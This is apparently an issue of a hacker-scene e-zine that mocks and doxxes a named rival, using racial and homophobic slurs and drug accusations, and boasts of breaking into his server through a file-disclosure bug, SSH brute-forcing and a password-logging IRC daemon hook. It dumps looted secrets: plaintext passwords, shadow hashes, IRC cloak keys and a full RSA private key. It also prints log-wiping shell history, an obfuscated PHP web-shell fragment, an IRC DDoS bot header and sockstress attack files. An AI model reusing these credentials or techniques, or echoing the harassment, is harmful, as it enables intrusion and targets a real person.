░░ ░░░░░░░░░░░░ ▒▒████ ░░ ░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░ ▓▓██▓▓██▓▓ ░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ████ ▓▓██░░ ░░░░ ░ ░░░░░░ ░░ ░░ ░░░░░ ░░ ░░░░░ ░░░░░░░░░ ░░██▒▒ ████ ░░░░ ░ ░░░░░▒ ▒ ▒▒░░ ░ ░ ░░░░ ░░ ░ ░░░░ ░░░░░░░ ░░▒▒░░ ░░▓▓████░░▒▒██▓▓ ░░ ░ ▒ ▒▒▒▒ ░ ░░ ░░░ ░░ ░░ ░░░ ░░░░░ ▒▒██████▓▓████▒▒ ▓▓ ▓▓██░░ ░ ░▒▒▒▒▒ ▒ ░ ░░░ ░░ ░░ ░░░ ░░ ░ ░░▓▓████▒▒████▓▓░░ ▒▒▒▒░░██▓▓ ░ ░▒▒▒▒▒ ▒ ▒▒▒▒ ░ ░░░░ ░ ░░ ░░░░ ░ ░▓▓████▒▒ ▒▒▓▓ ░░██░░▒▒██▒▒ ░ ░▒▒▒▒▒ ▒ ▒▒▒▒ ░ ░░░░░ ░░ ░░░░░ █████░░ ▓▓░░ ░░▓▓████▓▓░░██▓▓ ░ ░▒▒▒▒▒ ▒ ░░░░ ░ ░░░░░░ ░░ ░ ▓▓█ █▒▒ ░░▓▓░░████▓▓▒▒██████▒▒ ░░░░▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░░░░ ▒▒████▓▓ ▒▒████░░ ████░░ ░░░░▒▒▒▒▒▒▒▒░░░░░░░░ ░░▓▓████░░ ██▓▓ ░░░░▒▒▒▒▒▒▒▒░░░░░░░░ ▒▒████▓▓ ▒▒░░ ░░████░░ ░░░░▒▒▒▒▒▒▒▒░░░░░░ ░░██████░░ ▓▓ ▒▒████░░ ░░░░▒▒▒▒▒▒░░░░░░░░ ▒▒██████▓▓▒▒░░ ▓▓ ░░▒▒░░████▒▒ ░░░░░░░░░░ ░░░░▒▒▒▒▒▒░░░░░░ ░░██████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▓▓ ██████ ░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░ ████▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓▓▓██▓▓▓▓████░░ ░░░░░░░░▒▒▒▒░░░░ ░░░░░░░░░░░░░░ ▓▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓▓▓████▓▓ ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░░░░░░░░░ ████▓▓▓▓▓▓██▓▓▓▓▓▓██▓▓██████░░ ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░░░ ░░██████▓▓▓▓▓▓██▓▓▓▓▓▓▓▓████▓▓ ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▓▓████▓▓▓▓██▓▓▓▓▓▓██▓▓██████░░░░░░ ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░████▓▓▓▓██████▓▓▓▓██████▓▓░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▓▓██▒▒▓▓▓▓████████████████▒▒░░░░░░░░░░░░░░▒▒Roto-Rooted Bi-Weekly▒▒▒░░ ▒▒██▓▓░░▒▒██████▒▒░░██████▓▓░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒The Story of Hann▒▒▒░░░░ ░░████▒▒░░████▓▓▓▓░░░░░░▒▒▓▓▒▒░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░ ▓▓██▒▒░░▒▒██▓▓░░░░░░░░░░░░░░░░░░░░▒▒EllyEl8 & The SilverLords▒▒▒▒▒░░░░░░░░░░ ▓▓░░░░████░░ ░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░░░░░░░░ ▓▓██▒▒ ░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░░░░░░░░ Some call him Michael Dean Major, Jr. Others know him as hann aka marcdoubt aka patton aka niggered aka roughly a million other nicks. No matter what name you know him as, you'll know he's a total louse and he has been a scab on the scene for months and months! He has been expunged from every group he has attempted to brown-nose his way into because he is a lying, self-aggrandizing, thief, know-nothing, meanie junky who couldn't hold HTP's jockstrap (even though he did for a few months, sadly). After being brutally destroyed in DoxBin6, our hapless hero realized that ultimately, he couldn't keep away from the "scene" (whatever that is). He announced to the world that he was "BACC"! People gathered around, and then we got to watch him convulse on TinyChat, shooting up some black tar heroin and mumbling incoherent ebonics. He's such a classy guy~ Once Stage One of his super-ultimate plan had been completed, he launched himself into Stage Two with a cunning rivalled only by slightly retarded monkeys. He dropped names and licked ass, but failed to get into any groups, mostly because nobody is enough of a silly goose to mistake schizophrenic blogging libterally sprinkled with nicks everyone knows for actual skill. It wasn't over, though. Hann knew the scene needed him. It needed a champion! And so he gathered a group of super-talented scene titans! #SEVENSSSSSSS was born; his very own crew of xbox-live skids, try-hard rappers, and swatters! #SEVENSSSSSSS~ Little did he know that the SilverLords had been paying close attention and with our mighty Brazilian powers combined were able to own him thrice in as many weeks. HAhaeuheAUHEaleAHUEHAuaheauaAUAhehAh ekkekEK EKkekekeKEk hAHuehaelLEEle;KEkEKkEK = 2014-02-02 21:13 <~marc> 3rd time i ever set up unreal+anope Gee, I wonder why? Let's explore... -==========================================================- -=== Exhibit A: vps.schoolofprivacy.eu ====================- -==========================================================- <~sevens> this server is <~sevens> soooooooooooooooooooooooooo <~sevens> secure <~sevens> like u have no idea how hard i worked <~sevens> before i even <~sevens> made ircd a user <~sevens> from ground up So, you've started the most elite hacker group in town, but you have no servers or money to speak of, what do you do? If you have anything like the skillset of Mister Michael Dean Major you will pucker up your lips and suck every cock in town for a free shared shell to build your budding IRC network on. Now that you've acquired a secure base, we need to setup our IRC network. Any true SilverLord knows that compartmentalization is key in maintaining your network's security. Hann knows this, so he tells everyone that they have individualized onions (don't leak lol!), but a 12 line bash script is too much effort so fuck it, we'll skip the implementation (none of your friends would betray you, anyway, right?). Next step is to bind all the ports to localhost, he skips this too, since he knows that nobody likes him enough to go through the effort of reconfiguring their IRC clients to connect to Tor hidden services. So, since we have the clearnet address of his box, the logical step is to start probing services! He's got some gross web apps running, but one of these had a cute LFD we were able to leverage to enumerate the usernames from /etc/passwd. When we pull out our handy-dandy SSH bruteforcer we find that we have access to 3 (Golly!) different user accounts on the box. Logging into the box and running "ps faux" reveals this fine example of stellar adminning: root 31833 ? Jan16 0:03 /usr/sbin/sshd -D root 14338 ? Jan17 0:02 \_ sshd: patton@pts/0 root 14351 pts/0 Jan17 0:00 | \_ -bash ircd 14527 pts/0 Jan17 0:00 | \_ su ircd ircd 14528 pts/0 Jan17 0:00 | \_ bash root 14611 pts/0 Jan17 0:00 | \_ su patton root 14612 pts/0 Jan17 0:00 | \_ bash ircd 14701 pts/0 Jan17 0:00 | \_ su ircd ircd 14702 pts/0 Jan17 0:00 | \_ bash root 24417 pts/0 Jan18 0:00 | \_ su patton root 24418 pts/0 Jan18 0:00 | \_ bash As all good admins know, leaving everyone's home directories with global read permissions is paramount to security. Following this principle, we were able to copy ircd.tar.gz from /home/ircd, which what do you know, has Anope databases in it! Using our very own Brazillian Anope database parser we find that "nigg"'s (hann appears to think he's black) NickServ password is "hitlist1", which also happens to be the ircd's user account on the box! After much rejoicing, we mined all of the logs from his bots (very ethical, Mister Dean) and proceeded to hackily hook his IRCd. Being slightly impatient, we decided to go ahead and restart the IRCd and see if he didn't notice. This nets us his oper hash, "datgoodgreen" (more wigger shit). ~ # grep -Ei "(oper|identify)" log BOPM: ns identify pass123 BOPM: OPER nigg datgoodgreen BOPM: JOIN #oper rory: JOIN #opers rory: MODE #opers rory: MODE #opers rory: oper nigg datgoodgreen rory: PRIVMSG nickserv :identify hitlist1 nc: JOIN #opers nc: MODE #opers ~ # Unfortunately, hann was wide awake on a cocaine binge and noticed the IRCd restart right away, but after finding us in nearly every user account on the box despite his best attempts at expunging us (deleting /tmp/) he decided he should reformat it. Happily for Melly, hann really enjoyed the Unreal hook: but he did leave me a nice unreal hook to steal Thanks hann! Guess we'll share with the class: FILE *f = fopen("log", "a+"); fprintf(f, "%s: %s\n", (*cptr->name ? cptr->name : "*"), cptr->buffer); fclose(f); Anyone with half a brain and ten minutes could come up with something better, but that's hann for you, he can't do any original work so he just steals everything can find. RIP #SEVENSv1. heaheuHAUhuaheuswuAUhaHUEaHUTHHTHTht kekkekekkeaf Let's check out his unrealircd.conf: ircd@vps.schoolofprivacy.eu:~$ cat Unreal/Unreal3.2/unrealircd.conf # For *NIX, uncomment these 2 lines: loadmodule src/modules/commands.so; loadmodule src/modules/cloak.so; include "aliases/anope.conf"; # For WINDOWS, uncomment these 2 lines: #loadmodule modules/commands.dll; #loadmodule modules/cloak.dll; listen 127.0.0.1:6669; link Chippy1337.seve.ns.gov { username *; hostname 127.0.0.1; bind-ip 127.0.0.1; port 6669; hub qaeda.seve.ns.gov; password-connect "dickshit"; password-receive "dickshit"; class default; }; # ME block [REQUIRED] me { # Server name name "Seve.ns"; # Server description info "(Al-Qaeda Label)"; # Server numeric. Must be between 1 and 255. # This number must be unique among the servers in the network. numeric 100; }; tld { mask *@*; motd services.motd; rules rules.motd; shortmotd services.motd; opermotd services.motd; botmotd services.motd; options { ssl; }; }; # ADMIN block [REQUIRED] admin { # Anything can go in this block, most people just put their nick and email. "Nick: rory"; "Email: rory@nsa.gov"; }; # CLASS block [RECOMMENDED] class clients { # How often do we ping clients? pingfreq 90; # How many clients should this class hold? maxclients 500; options { nofakelag; }; # How much are they allowed to send or receive at one time? sendq 100000; recvq 8000; }; # ALLOW block [REQUIRED] allow { # Host OR IP to match. Note this is OR not AND! ip *@*; hostname *@*; maxperip 100; # What class do these users go into? class clients; }; # LISTEN block [REQUIRED] # You can have as many of these as you want. # The syntax is: listen :port; listen *:6667; listen *:6697 { options { ssl; clientsonly; }; }; listen *:7000 { options { ssl; serversonly; }; }; listen *:9899 { options { ssl; serversonly; }; }; listen *:9890 { options { ssl; serversonly; }; }; set { modes-on-connect "+ixw"; modes-on-oper "+bxwgs"; oper-auto-join "#opers"; anti-spam-quit-message-time 10s; oper-only-stats "okfGsMRUEelLCXzdD"; throttle { connections 60; period 60s; }; }; # OPER block [RECOMMENDED] # You can have as many oper blocks as you want. oper nigg { class clients; from { userhost *@*; }; password "$Pw6tGPMk$i8ZwNi/4YQcuQ5IgecEaGkikhCw=" { sha1; }; flags oOCAaNrDRwgcLkKbBnGztZWHvqXFd; swhois "SEVENS"; snomask fkvGnNqsSocF; }; oper nc { class clients; from { userhost *@*; }; password "$Pw6tGPMk$i8ZwNi/4YQcuQ5IgecEaGkikhCw=" { sha1; }; flags oOCAaNrDRwgcLkKbBnGztZWHvqXFd; swhois "SEVENS"; snomask fkvGnNqsSocF; }; # DRPASS block [RECOMMENDED] drpass { # Password for /restart restart "plz-restart"; # Password for /die die "die-you-stupid"; }; # LOG block [RECOMMENDED] log ircd.log { # What is the biggest to let this file get? maxsize 5MB; # What do we want to log? flags { # For descriptions of these flags, see doc/unreal32docs.html errors; kills; tkl; connects; server-connects; oper; sadmin-commands; chg-commands; oper-override; spamfilter; }; }; # SET block [REQUIRED] set { # Email address to give to banned users. kline-address "rory@nsa.gov"; # How many channels each user may be in. maxchannelsperuser 10; # The default network server if this one is full. default-server none; # What is the name of the Services Server? services-server Chippy1337.seve.ns.gov; # What is the name of the network? NO SPACES! network-name Qae.da.Seve.ns; # Oper hosts for each oper level hosts { global "seve.ns"; coadmin "coadmin.seve.ns"; admin "admin.seve.ns"; servicesadmin "csops.seve.ns"; netadmin "wow.qae.da.seve.ns"; host-on-oper-up "yes"; }; options { hide-ulines; flat-map; fail-oper-warn; show-connect-info; }; # Where do people go for help? help-channel "#help"; # What to put in front of cloaked hosts hiddenhost-prefix "Special-Agent"; # Keys to cloak the host with. THESE SHOULD BE KEPT SECRET!111!1 # These keys must be the same on all servers in the network. cloak-keys { "AFXn01nlcH47532khx0xcoP4PI2C"; "4HT7rj7D6HY757Tc"; "n0orN3ilcJTi8CFQFX"; }; }; ulines { Chippy1337.seve.ns.gov; zalgo.irc.cuteis.us; ramnode.cuteis.us; pro.cuteis.us; frack.cuteis.us; scout.cuteis.us; }; ircd@vps.schoolofprivacy.eu:~$ # DOES /bin/nologon MEAN NOTHING TO YOU? ircd@vps.schoolofprivacy.eu:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:104::/var/run/dbus:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:104:106:MySQL Server,,,:/nonexistent:/bin/false quasselcore:x:105:108::/var/lib/quassel:/bin/false r00t:x:1000:1000::/home/r00t:/bin/sh sutler:x:1001:1001:sutler,1,1,1,1:/home/sutler:/bin/bash jammy:x:1002:1002:1,1,1,1,1:/home/jammy:/bin/bash kenose:x:1003:1003:1,1,1,1,1:/home/kenose:/bin/bash josh:x:1004:1004:,,,:/home/josh:/bin/bash bitlbee:x:106:109::/var/lib/bitlbee/:/bin/false danny:x:1005:1005:1,,,:/home/danny:/bin/bash spyco:x:1008:1008:,,,:/home/spyco:/bin/bash freedomhacker:x:1009:1009:,,,:/home/freedomhacker:/bin/bash postfix:x:107:110::/var/spool/postfix:/bin/false narwaal:x:1010:1010:,,,:/home/narwaal:/bin/bash meep:x:1007:1007:,,,:/home/meep:/bin/bash patton:x:0:1011:,,,:/home/patton:/bin/bash znc:x:1011:1012:,,,:/home/znc:/bin/bash brr:x:1012:1013:brr,,,,cute:/home/brr:/bin/bash hav0c:x:1013:1014:,,,:/home/hav0c:/bin/bash nc:x:1015:1015:,,,:/home/nc:/bin/bash ircd:x:1006:1016:,,,:/home/ircd:/bin/bash debian-tor:x:108:112::/var/lib/tor:/bin/bash How about some Anope passwords? prdelka:fa99cada9641da08dddf648e5a1b280bbf5b4143:dongs bopm:aafdc23870ecbcd3d557b6423a8982134e17927e:pass123 dmzpkts:b1aa14315bdbc2bdb4db442c176b0819f2eae550:niggers motion:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8:password cep:dd2edb87ea9eb7a32fd4057276d3a1fab861c1d5:fuckyou rory:a83dbd8bd016409f317f477f9cf8dddf3eed8230:hitlist1 ^ PASSWORD SECURTY IS PARAMOUNT HERE AS U CAN SEE KEKEKEKE chF:72ac9340a7e5174197d243cc9e63246970c1ce16:loldongs123 nc:bdd2bcf4af533a52a8872f016d5dc31cefbd9366:diggernicks TruePatriot:6fac8d1acd7d66db1c2abc3d31ed8fea13790f49:dickslol wind:d4ebe94783ee5032ce16b8a340310935433bd886:loldongs321 thraxx:dd5003fbb919aba77617d82fff97a7f0c54fadbf:123sevens! riako:31ece04fcf21a6be7789bca5a09c7462e0ea6bca:imgayimgayimgay In the end, we only got to run amuck in the box for a couple of hours (._____.). Since hann couldn't handle the SilverLords, he had to concede defeat and delete fucking everything! Of course, hann suffers from delusions of grandeur and cannot be defeated, so to hann this is a victory against the chatters! Everybody wins! Yaaaaaaay! :D Michael would have us believe that only two people hate him in the whole wide world, but he is about to find out that nobody likes him, he's just an Elly and Melly punching bag. kekekkekkKEhAhAHhaeuEheuahUAHEhauHUAehuehuaheuUAHe -==========================================================- -=== Exhibit B: vps.schoolofprivacy.eu ... AGAIN?!?>! =====- -==========================================================- What if we were to tell you, that we did have an insider all along? Well, we totally did. One Glorious Knight of the SilverLord Roundtable had gained trust through disinformation, Mitnicking and juping peoples' nicks and credz. Good ol' hacking too. [Lord]IntangirTheGod managed to root the box with clever heckin' maneuvers and took it to it, grabbing everything that was great off the box, including hann's important research, which we will show in a minute. Then zeekill went and nulled the box before we could "tidy up the box" for him. OH WELL kekekKEHAhleahehUAUHEuahUAEHuehehauHAh. RIP #SEVENSv2. root@priv11:~# cat /etc/shadow root:$6$VwE2NKOa$usqlPIfMFEUfSr1mWOhyO2cyLMuYe8qbjq3I.wwa8HvnAC8PURZgg2rU/mEE1jtfO3ntQv4ub18BI5Sme7RB81:16090:0:99999:7::: daemon:*:15456:0:99999:7::: bin:*:15456:0:99999:7::: sys:*:15456:0:99999:7::: sync:*:15456:0:99999:7::: games:*:15456:0:99999:7::: man:*:15456:0:99999:7::: lp:*:15456:0:99999:7::: mail:*:15456:0:99999:7::: news:*:15456:0:99999:7::: uucp:*:15456:0:99999:7::: proxy:*:15456:0:99999:7::: www-data:*:15456:0:99999:7::: backup:*:15456:0:99999:7::: list:*:15456:0:99999:7::: irc:*:15456:0:99999:7::: gnats:*:15456:0:99999:7::: nobody:*:15456:0:99999:7::: libuuid:!:15456:0:99999:7::: syslog:*:15456:0:99999:7::: messagebus:*:15456:0:99999:7::: sshd:*:15456:0:99999:7::: mysql:!:15702:0:99999:7::: ircd:$6$p5stWK5d$KWaty2jOzbe5fCt7ClMgQy9z8Vtl3/QZTkG.IQ55sooxAxLkNnGhqPlKBaygsDKuMCe6mlBcsKMvnjhvlcl8X1:16093:0:99999:7::: debian-tor:*:16091:0:99999:7::: sevens:$6$X20vZuXB$47GYAIw6hswpBZLF8zu6oqxdBFM4.NgF/i7Z8TLac//m1xp.a0ye6f8eWoyUwFsolKMG94JfW6bt/ayrq40WZ1:16096:0:99999:7::: stunnel4:!:16092:0:99999:7::: bitlbee:!:16092:0:99999:7::: git:$6$79vMHUZE$c/Tun75Y1yBLLYPZn8n3YQNzY8AExfbR1YjunNXjpqsAqdrgqbxLWsub/f1625Nu8fcR2O5Aiw41Dr3/UXBXV1:16093:0:99999:7::: w:$6$/iXCn59q$eQqO9gbZQffhmsaz6XhPPfpoSR7BT4ktiTJqjFqrgmBQm.DFBXdAJdlFIoZCGazpskWWjJq9fJ4FVHfqxExCr/:16100:0:99999:7::: root@priv11:~# cat .bash_history apt-get update apt-get dist-upgrade vi /etc/rc.local ls -lah vi onboot.sh chmod +x onboot.sh :> /root/.mysql_history :> /var/log/lastlog :> /root/.bash_history :> /var/log/wtmp rm /etc/ssh/ssh_host_*_key{,.pub} ^^----WE AREN'T QUITE SURE IF THAT WORKED THERE, CHIEF LOL ls /etc/ssh :> /root/.mysql_history :> /var/log/lastlog :> /root/.bash_history :> /var/log/wtmp poweroff su ircd apt-get isntall screen apt-get install screen apt-get install libxml2-dev libxslt-dev apt-get install python-lxml screen adduser sevens nano /etc/passwd uname -a;id adduser ircd passwd ircd apt-get update apt-get upgrade apt-get kernel-update apt-get upgrade aptitude safe-upgrade uname -a uname -aid uname -a;id apt-get safe-upgrade aptitude safe-upgrade apt-get install build-essentials apt-get install build-essential hostname SOPriv apt-get install tor cd /etc/tor ls cd /var/lib/tor ls cd /etc/tor ls nano torrc killall tor tor cd /var/lib/tor ls cd ./hidden_service/ ls git glone https://github.com/katmagic/Shallot.git apt-get install git git clone https://github.com/katmagic/Shallot.git ls cd ./Shallot/ ls ./configure apt-get isntall gcc apt-get install gcc ./configure && make apt-get install pen-ssl apt-get install open-ssl apt-get install ssllibs apt-get install openssl apt-get install libcurl4-openssl-dev ./configure && make ls ./shallot ./shallot sevens ./shallot nojihad cd - rm private_key nano private_key killall tor tor nano hostname cd /home/ircd/ su ircd root@priv11:~# cat .ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAyW+SsLYZrR5s44Udng+42wbyRjDwb9hp7JjDcG/0jR5UwcA1 IGl3TLKlegeftb3Pb4+p0qU7c1wzn5doeo7niMHOZbTq1lxiYkQeAlj29jTJV44i Nh7Zwoz+U0moIFFXoiONaLp2UNxs6DM0xbAkTdQZbYKrPmrVNg/Fl0yenC4q5x/W WhGgTMYlfYTPuCQglVGq7FgH1LaCXoOndF83wGixZylWHIpiuMc3mVGm7xtz2lZU DPFouOH4jlNA+F+ovdT620oueAysG/iKekJIgcZySCH7XlswSENqdJdyHjiLNsSv wB8RFXNFICXlEYZvEF7TXOPKo3masBtKhIbISQIDAQABAoIBABsF9M/wHhGzezgq q4aA5XO8wtPXzOm0RsGO3OlAm7Yy03wKpRXsEC0h6kEstKhVBncY9tdjg04+mE5Y qZOHiFg4Z9ANLVQEoM4+BSibdsYg3sH4N267RMtsztGtl/h98Ru3WUkreqPubk3Y UMQUlUo7og2m8gI1otTV2NQrWzvoWFDVxVvetP+THfuK/lkK3rpsSx1VCExNKDhq rKwZ2bo+4VzrDi8IA++3b/72f6v42xNtPJYih7w7ECzVRzMFk9oo3yZcwni/ZTvC O2qqHnQsNPVFFwcKu3t1oG2eCH+FsZgMPhTqbHap6KB+HHgm2uTribM8Ztc55dAY HRpoAuECgYEA/zLbtXEpXZlOqJXd2MPU6oSy82TXN8eqY6zFDhQHyfWlVt6gZ2jq sX+JSQg4X3tc1zUczYPhcSZHETRfin4IIwPnIy1D/xOFw8YrCDxcVotP3ySfYhmO ZRZQJ3YCJ2DuEVm4dX5LNwgM7TUxDkn/RsVGSkyQrdvW+KS4Gg2JTF8CgYEAyhF/ WQAVMUfYdjBM/sG552kMgL3GEIlHJ53cRGOlSzKi3rtrfeX9tpbJAT+dKZBhdsja 86+F5XCDtucv7TW3/e4z60Ta1Y0BBsIijjZIciEDeE7G9SjLydmiUZM+OkWc52kb bE4omfZi3rg2YiCllW6MWKXtQfHGl4EVAN8yrFcCgYAh/YsoApeI4PeKGtP+oC7G wb/4DTFhO5XlSsjAVEipTK+l/2cL/vxrgdouQQsJJKw7+dYJRYyMfpWuo/QpxRme WFG77LaGzfneFpH6udduq4WK6hzUeyTtL+ijKOOmjRGIfBPGinjILqlSGuiax55Z tcLj+Ii4r3RVj9L5nV3xLwKBgGuYBYcOVDp5VvkXnufHn4Vomg+y/NOxRQIDPFXt +QWhYLfYc9QFsqKWh1Dy3mxTRJJLQMqgm1sgHgI1938HK4E6ZMrRTvSGsBU5Kc0v ekPK8F4PFEFWB6zjBVsKXAgLKRDPFpsEwvm4B80vqUV2vLRkuLY7I6oJYwUo5lYg gorhAoGBAPmWkiL2AlqjJfoocf5Gz9SKFOVC6iV++Z/Dz1vMKW2FjTX/uiTfRsPO mn/+NqBo1/Kiy8YP6+Dxrjytv/AtMx0TWzEoKev40d5ZzuUseQRpzHaSK75KKHzp rmYhQ1EU/Y3sy4LJyV25g9i2YAqOmk430vvUOjsYqXfiDFbBMe/G -----END RSA PRIVATE KEY----- root@priv11:~# cat .ssh/id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJb5KwthmtHmzjhR2eD7jbBvJGMPBv2GnsmMNwb/SNHlTBwDUgaXdMsqV6B5+1vc9vj6nSpTtzXDOfl2h6jueIwc5ltOrWXGJiRB4CWPb2NMlXjiI2HtnCjP5TSaggUVeiI41ounZQ3GzoMzTFsCRN1Bltgqs+atU2D8WXTJ6cLirnH9ZaEaBMxiV9hM+4JCCVUarsWAfUtoJeg6d0XzfAaLFnKVYcimK4xzeZUabvG3PaVlQM8Wi44fiOU0D4X6i91PrbSi54DKwb+Ip6QkiBxnJIIfteWzBIQ2p0l3IeOIs2xK/AHxEVc0UgJeURhm8QXtNc48qjeZqwG0qEhshJ root@priv11 root@priv11:/home/sevens# ls -lart total 312 -rw-r--r-- 1 sevens sevens 39927 Jan 15 14:10 k.c -rw-r--r-- 1 sevens sevens 675 Jan 21 00:43 .profile -rw-r--r-- 1 sevens sevens 3486 Jan 21 00:43 .bashrc -rw-r--r-- 1 sevens sevens 220 Jan 21 00:43 .bash_logout drwx------ 2 sevens sevens 4096 Jan 21 00:45 .cache drwx------ 3 sevens sevens 4096 Jan 21 00:46 .config -rw-r--r-- 1 sevens sevens 0 Jan 22 17:37 .hushlogin drwxr-xr-x 7 sevens sevens 4096 Jan 23 03:21 .. drwxr-xr-x 2 sevens sevens 4096 Jan 23 03:37 .ssh drwxr-xr-x 3 sevens sevens 4096 Jan 24 16:47 home -rw-r--r-- 1 sevens sevens 57546 Jan 26 13:15 b374k.php -rw-r--r-- 1 sevens sevens 128270 Jan 26 14:46 b37.txt drwx------ 2 sevens sevens 4096 Jan 26 16:36 .gnupg -rw-r--r-- 1 sevens sevens 33715 Jan 26 21:23 .zcompdump -rw------- 1 sevens sevens 16 Jan 30 14:35 .nano_history drwxr-xr-x 7 sevens sevens 4096 Jan 30 17:43 . -rw------- 1 sevens sevens 149 Jan 30 20:11 .bash_history root@priv11:/home/sevens# cat .bash_history df -h grep "ALF" * htop df -h cd /tmp ls rm -rf ALF.S01-S04.COMPLETE.DVDRip.XviD-SCC/ <----lelelelelelelelekakkakekoaekOKEAOakehaHAUHAUAH df -h nc irc.echonode.com 6667 last cat /etc/passwd who w last ^^^^^^ PARANOIA RUNS DEEP, INTO YOUR LIFE IT WILL SEEP -==========================================================- -=== /!\ WARNING INTENSIVE RESEARCH IN PROGRESS /!\ =======- -==========================================================- "I'm so glad I do real research and am not just a chatter." - Michael Dean Major, Jr. root@priv11:/home/sevens# head k.c /******************************************************************************* * This is a IRC based distributed denial of service client. It connects to * * the server specified below and accepts commands via the channel specified. * * The syntax is: * * ! * * You send this message to the channel that is defined later in this code. * * Where is the nickname of the client (which can include wildcards) * * and the command is the command that should be sent. For example, if you * * want to tell all the clients with the nickname starting with N, to send you * * the help message, you type in the channel: * root@priv11:/home/sevens# lol bash: lol: command not found root@priv11:/home/sevens# head b374k.php ".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$b374k("7P1nm+M20igMf779K7RaH/f0qqdJUXnG3V4FKkukcrB9+mImxShGSbb/+wswiZTUPT1je8/e7/WMd2cohEKhUACqCkDVjz8ZovFdJvO99eJyZuYpk8UeK9nP8Lct2QoHU root@priv11:/home/sevens# lolol bash: lolol: command not found root@priv11:/home/sevens# cd home root@priv11:/home/sevens/home# ls -lart total 80 -rw-r--r-- 1 sevens sevens 7139 Apr 16 2012 README.txt -rw-r--r-- 1 sevens sevens 120 Apr 16 2012 Makefile -rw-r--r-- 1 sevens sevens 16291 Apr 16 2012 sockstress.c -rwxr-xr-x 1 sevens sevens 153 Apr 16 2012 drop_rst.sh drwxr-xr-x 2 sevens sevens 4096 Apr 16 2012 payloads -rw-r--r-- 1 sevens sevens 8980 Jan 24 16:46 sockstress.o -rwxr-xr-x 1 sevens sevens 17036 Jan 24 16:46 sockstress -rw-r--r-- 1 sevens sevens 110 Jan 24 16:47 irc drwxr-xr-x 3 sevens sevens 4096 Jan 24 16:47 . drwxr-xr-x 7 sevens sevens 4096 Jan 30 17:43 .. root@priv11:/home/sevens/home# # oooh yeah here we go, hann's OHDAY PARTY TIME! root@priv11:/home/sevens/home# head sockstress.c/* * _____ ____ _____ _ __ _____ _______ _____ ______ _____ _____ * / ____|/ __ \ / ____| |/ // ____|__ __| __ \| ____|/ ____|/ ____| * | (___ | | | | | | ' /| (___ | | | |__) | |__ | (___ | (___ * \___ \| | | | | | < \___ \ | | | _ /| __| \___ \ \___ \ * ____) | |__| | |____| . \ ____) | | | | | \ \| |____ ____) |____) | * |_____/ \____/ \_____|_|\_\_____/ |_| |_| \_\______|_____/|_____/ * * CVE-2008-4609 * https://defuse.ca/sockstress.htm root@priv11:/home/sevens/home# # hann's 2k-h1p2c0de y0 root@priv11:/home/sevens/home# head drop_rst.sh #!/bin/bash if [ $# -eq 0 ] ; then echo "Usage: ./drop_rst.sh " exit 1 fi iptables -A OUTPUT -p tcp --tcp-flags rst rst -d $1 -j DROP root@priv11:/home/sevens/home# # NARY A CHAR WASTED WITH THIS BEAUT! alright, let's take a look at this payloads dir... I'm sure this is where all his hardcore research goes... root@priv11:/home/sevens/home/payloads# ls -lart total 24 -rw-r--r-- 1 sevens sevens 130 Apr 16 2012 smtp -rw-r--r-- 1 sevens sevens 20 Apr 16 2012 http -rw-r--r-- 1 sevens sevens 21 Apr 16 2012 dns_axfr -rw-r--r-- 1 sevens sevens 29 Apr 16 2012 dns_a drwxr-xr-x 2 sevens sevens 4096 Apr 16 2012 . drwxr-xr-x 3 sevens sevens 4096 Jan 24 16:47 .. root@priv11:/home/sevens/home/payloads# cat smtp HELO gmail.com MAIL FROM: foo@gmail.com RCPT TO: victim@victim-domain.com DATA Subject: AAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBB . QUIT root@priv11:/home/sevens/home/payloads# cat http GET / HTTP/1.0 root@priv11:/home/sevens/home/payloads# cat dns_a 0waffle.co% root@priv11:/home/sevens/home/payloads# cat dns_axfr 